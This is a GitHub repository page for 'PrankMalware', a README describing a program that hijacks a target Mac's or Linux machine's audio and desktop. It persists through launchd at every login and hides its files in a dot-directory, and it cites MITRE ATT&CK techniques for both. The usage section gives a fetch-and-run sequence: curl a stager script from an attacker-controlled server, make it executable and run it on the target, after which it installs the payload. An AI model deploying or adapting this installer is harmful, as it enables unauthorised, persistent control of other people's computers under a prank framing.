Skip to content

Hippi3Hack3r/PrankMalware

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

19 Commits
.sshlocal
.sshlocal
 
 
README.md
README.md
 
 
stager.sh
stager.sh
 
 

Repository files navigation

Prankware

Why

Hi! This program was developed to settle a score between friendly rivals. I couldn't find a program to do what I wanted on OSX so I wrote my own. Please do not use this software maliciously.

What does this program do?

This program takes over the target computers volume and blasts audio from a wav file of your choice. AC/DC is encouraged but not required. The music will also play upon machine startup, after a logout followed by a login, and at random intervals between 1 and 4 hours.

84% of development was done on a Saturday afternoon, so there are probably lots of bugs. feel free to create an issue, or better yet, fix it and create a Pull Request.

The music file is this jam from pixelbay. You can use whatever file you want just rename it to "apple-sound1"

(Mac only) This program ALSO changes the computers background to plain black and every so often flashes "The Matrix has you."

MITRE ATT&CK tactics employed:

TA0003 - Persistance: Scripts are loaded up on login.
T1027 - Obfuscation: Program files are stored in a directory starting with a '.' which means they will be harder to discover.

Installation

The target machine to have a python3 interpreter. It does not require root permissions and is designed to be run without any extra dependencies. (This was not entirely possible on linux).

How you deploy the program is your choice. Here's how I did it:

  1. Clone The repository
  2. zip the contents of the .sshlocal directory and upload to a server you control
  3. upload a .wav file to the same location on the server and name it "apple-sound1.wav" (anything else and you'll need to edit the scripts).
  4. profit

Usage

For now, this program is intended to be run on a target machine you have access to. On that machine run:

curl -O https://server-hosting-the-files/stager.sh
chmod +x stager.sh
./stager.sh
stager.sh will handle the install process, pulling down the zip files, and run the installer, as long as the steps in the installation section are followed.

To remove the program (sorry I'm not THAT evil)

launchd is used to run the python script. To stop it immediately and remove the plist file, run the the install script in the .sshlocal directory with the -r flag. install.sh --remove

About

No description, website, or topics provided.

Resources

Readme
Activity

Stars

3 stars

Watchers

1 watching

Forks

1 fork
Report repository

Releases

No releases published

Packages

 
 
 

Contributors

Languages